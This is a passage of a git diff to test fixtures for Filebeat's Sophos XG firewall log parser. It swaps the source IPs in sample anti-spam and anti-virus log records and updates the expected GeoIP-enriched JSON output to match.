+<30>device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="<oE6Bl1v.H9RXAIt.N5WB1my7xW.JavaMail.app@9in8-vovZnu.prod.17bud" mailsize=2025 spamaction="Reject" reason="Mail detected as SPAM." src_domainname="17buddies.net" dst_domainname="" src_ip=67.43.156.12 src_country_code=BRA dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=51789 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam"
+<30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=67.43.156.14 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL"
 <30>device="SFW" date=2017-01-31 time=18:34:41 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=041113413005 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Spam" status="" priority=Warning fw_rule_id=0 user_name="gaurav" av_policy_name="Gaurav123" from_email_address="gaurav1@iview.com" to_email_address=" gaurav2@iview.com" email_subject="RPD Spam Test: Spam" mailid="<a22c9da6-19e5-4764-2836-3f48d7dcc329@iview.com>" mailsize=405 spamaction="Accept" reason="" src_domainname=" iview.com" dst_domainname="" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol="TCP" src_port=22420 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam"
 <30>device="SFW" date=2018-06-06 time=11:10:11 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041114413006 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Probable Spam" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="rule 8" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman.local" email_subject="RPD Spam test: Bulk" mailid="<c63b1eb2-1c17-73ac-fcc3- 20e8831dc3d3@postman.local>" mailsize=439 spamaction="Drop" reason="Mail detected as OUTBOUND PROBABLE SPAM." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=58043 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam"
 <30>device="SFW" date=2018-06-06 time=12:50:07 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041121613009 log_type="Anti-Spam" log_component="SMTP" log_subtype="DLP" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="postman" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman. local" email_subject="Fwd: TESt" mailid="c0000002-1528269606" mailsize=5041 spamaction="DROP" reason="Email containing confidential data detected. Relevant Data Protection Policy applied." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60134 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="DLP"
diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json
index b8617119a8f8..04f1bad3aac6 100644
--- a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json
@@ -65,19 +65,9 @@
     {
         "@timestamp": "2020-05-18T14:38:49.000-02:00",
         "client.bytes": 0,
-        "client.ip": "92.38.133.63",
+        "client.ip": "89.160.20.156",
         "client.port": 52742,
-        "destination.as.number": 199567,
-        "destination.as.organization.name": "Fr. Sauter AG",
         "destination.bytes": 0,
-        "destination.geo.city_name": "Saint-Prex",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "CH",
-        "destination.geo.country_name": "Switzerland",
-        "destination.geo.location.lat": 46.4796,
-        "destination.geo.location.lon": 6.4599,
-        "destination.geo.region_iso_code": "CH-VD",
-        "destination.geo.region_name": "Vaud",
         "destination.ip": "185.8.209.194",
         "destination.port": 25,
         "destination.user.email": "info@pelasticuser.com",
@@ -89,7 +79,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:49 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=041105613003 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Clean\" status=\"\" priority=Information fw_rule_id=22 user_name=\"\" av_policy_name=\"Default\" from_email_address=\"telekommunikation@constant-big.email\" to_email_address=\"info@pelasticuser.com\" email_subject=\"Telefonservice statt Anrufbeantworter\" mailid=\"<MzQ4NzU1ODA4Mw==.70c409993fe53cb7c5e32c9974adf8ff@constant-big\" mailsize=13371 spamaction=\"Accept\" reason=\"Mail is Clean.\" src_domainname=\"constant-big.email\" dst_domainname=\"\" src_ip=92.38.133.63 src_country_code=USA dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=52742 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:49 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=041105613003 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Clean\" status=\"\" priority=Information fw_rule_id=22 user_name=\"\" av_policy_name=\"Default\" from_email_address=\"telekommunikation@constant-big.email\" to_email_address=\"info@pelasticuser.com\" email_subject=\"Telefonservice statt Anrufbeantworter\" mailid=\"<MzQ4NzU1ODA4Mw==.70c409993fe53cb7c5e32c9974adf8ff@constant-big\" mailsize=13371 spamaction=\"Accept\" reason=\"Mail is Clean.\" src_domainname=\"constant-big.email\" dst_domainname=\"\" src_ip=89.160.20.156 src_country_code=USA dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=52742 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"",
         "event.outcome": "success",
         "event.severity": "6",
         "event.timezone": "-02:00",
@@ -131,19 +121,19 @@
         "sophos.xg.reason": "Mail is Clean.",
         "sophos.xg.spamaction": "Accept",
         "sophos.xg.src_country_code": "USA",
-        "source.as.number": 199524,
-        "source.as.organization.name": "G-Core Labs S.A.",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
         "source.bytes": 0,
         "source.domain": "constant-big.email",
-        "source.geo.city_name": "Miami",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 25.7806,
-        "source.geo.location.lon": -80.1826,
-        "source.geo.region_iso_code": "US-FL",
-        "source.geo.region_name": "Florida",
-        "source.ip": "92.38.133.63",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 52742,
         "source.user.email": "telekommunikation@constant-big.email",
         "tags": [
@@ -154,19 +144,9 @@
     {
         "@timestamp": "2020-05-18T14:38:50.000-02:00",
         "client.bytes": 0,
-        "client.ip": "187.95.82.175",
+        "client.ip": "67.43.156.12",
         "client.port": 51789,
-        "destination.as.number": 199567,
-        "destination.as.organization.name": "Fr. Sauter AG",
         "destination.bytes": 0,
-        "destination.geo.city_name": "Saint-Prex",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "CH",
-        "destination.geo.country_name": "Switzerland",
-        "destination.geo.location.lat": 46.4796,
-        "destination.geo.location.lon": 6.4599,
-        "destination.geo.region_iso_code": "CH-VD",
-        "destination.geo.region_name": "Vaud",
         "destination.ip": "185.8.209.194",
         "destination.port": 25,
         "destination.user.email": "hein.mueck@elasticuser.de",
@@ -179,7 +159,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:50 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041107413001 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"Spam\" from_email_address=\"ripxfc@17buddies.net\" to_email_address=\"hein.mueck@elasticuser.de\" email_subject=\"nimm dringend Geld\" mailid=\"<oE6Bl1v.H9RXAIt.N5WB1my7xW.JavaMail.app@9in8-vovZnu.prod.17bud\" mailsize=2025 spamaction=\"Reject\" reason=\"Mail detected as SPAM.\" src_domainname=\"17buddies.net\" dst_domainname=\"\" src_ip=187.95.82.175 src_country_code=BRA dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=51789 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:50 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041107413001 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"Spam\" from_email_address=\"ripxfc@17buddies.net\" to_email_address=\"hein.mueck@elasticuser.de\" email_subject=\"nimm dringend Geld\" mailid=\"<oE6Bl1v.H9RXAIt.N5WB1my7xW.JavaMail.app@9in8-vovZnu.prod.17bud\" mailsize=2025 spamaction=\"Reject\" reason=\"Mail detected as SPAM.\" src_domainname=\"17buddies.net\" dst_domainname=\"\" src_ip=67.43.156.12 src_country_code=BRA dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=51789 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"",
         "event.outcome": "success",
         "event.severity": "4",
         "event.timezone": "-02:00",
@@ -192,7 +172,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 1540,
+        "log.offset": 1541,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -222,19 +202,15 @@
         "sophos.xg.reason": "Mail detected as SPAM.",
         "sophos.xg.spamaction": "Reject",
         "sophos.xg.src_country_code": "BRA",
-        "source.as.number": 262696,
-        "source.as.organization.name": "Turbonet Telecomunica\u00e7\u00f5es",
+        "source.as.number": 35908,
         "source.bytes": 0,
         "source.domain": "17buddies.net",
-        "source.geo.city_name": "Cabreuva",
-        "source.geo.continent_name": "South America",
-        "source.geo.country_iso_code": "BR",
-        "source.geo.country_name": "Brazil",
-        "source.geo.location.lat": -23.3149,
-        "source.geo.location.lon": -47.0763,
-        "source.geo.region_iso_code": "BR-SP",
-        "source.geo.region_name": "Sao Paulo",
-        "source.ip": "187.95.82.175",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.port": 51789,
         "source.user.email": "ripxfc@17buddies.net",
         "tags": [
@@ -245,19 +221,9 @@
     {
         "@timestamp": "2020-05-18T14:38:51.000-02:00",
         "client.bytes": 0,
-        "client.ip": "77.72.3.56",
+        "client.ip": "67.43.156.14",
         "client.port": 55002,
-        "destination.as.number": 199567,
-        "destination.as.organization.name": "Fr. Sauter AG",
         "destination.bytes": 0,
-        "destination.geo.city_name": "Saint-Prex",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "CH",
-        "destination.geo.country_name": "Switzerland",
-        "destination.geo.location.lat": 46.4796,
-        "destination.geo.location.lon": 6.4599,
-        "destination.geo.region_iso_code": "CH-VD",
-        "destination.geo.region_name": "Vaud",
         "destination.ip": "185.8.209.194",
         "destination.port": 25,
         "destination.user.email": "info@elasticuser.com",
@@ -270,7 +236,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=045908413004 log_type=\"Anti-Spam\" log_component=\"SMTPS\" log_subtype=\"Probable Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"rule3\" from_email_address=\"SHERIF.TOBGI@ELTOBGI.COM\" to_email_address=\"info@elasticuser.com\" email_subject=\"09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20\" mailid=\"<20200518070235.C1623996C64F9957@ELTOBGI.COM>\" mailsize=1032152 spamaction=\"Prefix Subject\" reason=\"Sender IP address is blacklisted.\" src_domainname=\"ELTOBGI.COM\" dst_domainname=\"\" src_ip=77.72.3.56 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"RBL\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=045908413004 log_type=\"Anti-Spam\" log_component=\"SMTPS\" log_subtype=\"Probable Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"rule3\" from_email_address=\"SHERIF.TOBGI@ELTOBGI.COM\" to_email_address=\"info@elasticuser.com\" email_subject=\"09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20\" mailid=\"<20200518070235.C1623996C64F9957@ELTOBGI.COM>\" mailsize=1032152 spamaction=\"Prefix Subject\" reason=\"Sender IP address is blacklisted.\" src_domainname=\"ELTOBGI.COM\" dst_domainname=\"\" src_ip=67.43.156.14 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"RBL\"",
         "event.outcome": "success",
         "event.severity": "4",
         "event.timezone": "-02:00",
@@ -313,16 +279,15 @@
         "sophos.xg.reason": "Sender IP address is blacklisted.",
         "sophos.xg.spamaction": "Prefix Subject",
         "sophos.xg.src_country_code": "GBR",
-        "source.as.number": 12488,
-        "source.as.organization.name": "Krystal Hosting Ltd",
+        "source.as.number": 35908,
         "source.bytes": 0,
         "source.domain": "ELTOBGI.COM",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4964,
-        "source.geo.location.lon": -0.1224,
-        "source.ip": "77.72.3.56",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.port": 55002,
         "source.user.email": "SHERIF.TOBGI@ELTOBGI.COM",
         "tags": [
@@ -361,7 +326,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 3123,
+        "log.offset": 3125,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "C44313350024-P29PUA",
@@ -432,7 +397,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 3852,
+        "log.offset": 3854,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "S4000806149EE49",
@@ -503,7 +468,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4627,
+        "log.offset": 4629,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "S4000806149EE49",
@@ -572,7 +537,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 5389,
+        "log.offset": 5391,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "S4000806149EE49",
@@ -642,7 +607,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 6143,
+        "log.offset": 6145,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "S4000806149EE49",
@@ -709,7 +674,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 6740,
+        "log.offset": 6742,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "S4000806149EE49",
@@ -779,7 +744,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 7445,
+        "log.offset": 7447,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "C44313350024-P29PUA",
diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log
index 9b6236d28c87..22ff5a6791f5 100644
--- a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log
+++ b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log
@@ -1,7 +1,7 @@
 <30>device="SFW" date=2020-05-18 time=14:38:33 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="Sandstorm" url="http://sophostest.com/Sandstorm/SBTestFile1.pdf" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.93 dst_country_code=USA protocol="TCP" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403
 <30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="EICAR-AV-Test" url="http://sophostest.com/eicar/index.html" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.18 dst_country_code=USA protocol="TCP" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403
-<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=82.165.194.211 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected"
-<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=23.254.247.78 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected"
+<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=1.128.3.4 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected"
+<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=216.160.83.61 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected"
 <30>device="SFW" date=2018-06-06 time=10:51:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036106211001 log_type="Anti-Virus" log_component="POPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="pankhil@postman.local" subject="EICAR" mailid="<a5c35e4b-1198-d0eb-0763-c0d5af3c817e@postman.local>" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56653 dst_port=995 sent_bytes=0 recv_bytes=0 quarantine_reason="Other"
 <30>device="SFW" date=2018-06-06 time=10:58:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036206212001 log_type="Anti-Virus" log_component="IMAPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="ganga@postman.local" subject="EICAR test email" mailid="<2ca37b7c-e93a-743a-99c4-a0796f0bbb79@postman.local>" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56632 dst_port=993 sent_bytes=0 recv_bytes=0 quarantine_reason="Other"
 <30>device="SFW" date=2018-06-21 time=19:50:23 timezone="CEST" device_name="SF01V" device_id=SFDemo-2df0960 log_id=031006209001 log_type="Anti-Virus" log_component="FTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" virus="EICAR-AV-Test" FTP_url="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" FTP_direction="Upload" filename=" /home/ftp-user/ta_test_file_1ta-cl1-46" file_size=0 file_path="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" ftpcommand="STOR" src_ip=10.146.13.49 src_country_code=R1 dst_ip=10.8.142.181 dst_country_code=R1 protocol="TCP" src_port=39910 dst_port=21 dstdomain="" sent_bytes=0 recv_bytes=0
diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json
index 4a59a7c79257..70d803619d12 100644
--- a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json
@@ -4,17 +4,7 @@
         "client.bytes": 550,
         "client.ip": "172.16.34.24",
         "client.port": 57695,
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 1616,
-        "destination.geo.city_name": "Seattle",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 47.6348,
-        "destination.geo.location.lon": -122.3451,
-        "destination.geo.region_iso_code": "US-WA",
-        "destination.geo.region_name": "Washington",
         "destination.ip": "13.226.155.93",
         "destination.port": 80,
         "event.action": "Virus",
@@ -88,17 +78,7 @@
         "client.bytes": 541,
         "client.ip": "172.16.34.24",
         "client.port": 57835,
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 553,
-        "destination.geo.city_name": "Seattle",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 47.6348,
-        "destination.geo.location.lon": -122.3451,
-        "destination.geo.region_iso_code": "US-WA",
-        "destination.geo.region_name": "Washington",
         "destination.ip": "13.226.155.18",
         "destination.port": 80,
         "event.action": "Virus",
@@ -170,16 +150,9 @@
     {
         "@timestamp": "2020-05-18T14:38:35.000-02:00",
         "client.bytes": 0,
-        "client.ip": "82.165.194.211",
+        "client.ip": "1.128.3.4",
         "client.port": 56336,
-        "destination.as.number": 19422,
-        "destination.as.organization.name": "Telefonica Moviles del Uruguay SA",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "South America",
-        "destination.geo.country_iso_code": "UY",
-        "destination.geo.country_name": "Uruguay",
-        "destination.geo.location.lat": -33.0,
-        "destination.geo.location.lon": -56.0,
         "destination.ip": "186.8.209.194",
         "destination.port": 25,
         "destination.user.email": "info@elastic-user.local",
@@ -192,7 +165,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"info@farasamed.com\" to_email_address=\"info@elastic-user.local\" subject=\"ZAHLUNG (PROFORMA INVOICE)\" mailid=\"<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr\" mailsize=2254721 virus=\"TR/AD.AgentTesla.eaz\" filename=\"\" quarantine=\"\" src_domainname=\"farasamed.com\" dst_domainname=\"\" src_ip=82.165.194.211 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"info@farasamed.com\" to_email_address=\"info@elastic-user.local\" subject=\"ZAHLUNG (PROFORMA INVOICE)\" mailid=\"<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr\" mailsize=2254721 virus=\"TR/AD.AgentTesla.eaz\" filename=\"\" quarantine=\"\" src_domainname=\"farasamed.com\" dst_domainname=\"\" src_ip=1.128.3.4 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"",
         "event.outcome": "success",
         "event.severity": "2",
         "event.timezone": "-02:00",
@@ -215,8 +188,8 @@
             "some_other_host.local"
         ],
         "related.ip": [
-            "186.8.209.194",
-            "82.165.194.211"
+            "1.128.3.4",
+            "186.8.209.194"
         ],
         "rule.id": "22",
         "server.bytes": 0,
@@ -238,15 +211,10 @@
         "sophos.xg.src_country_code": "DEU",
         "sophos.xg.subject": "ZAHLUNG (PROFORMA INVOICE)",
         "sophos.xg.virus": "TR/AD.AgentTesla.eaz",
-        "source.as.number": 8560,
-        "source.as.organization.name": "1&1 Ionos Se",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
         "source.bytes": 0,
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 51.2993,
-        "source.geo.location.lon": 9.491,
-        "source.ip": "82.165.194.211",
+        "source.ip": "1.128.3.4",
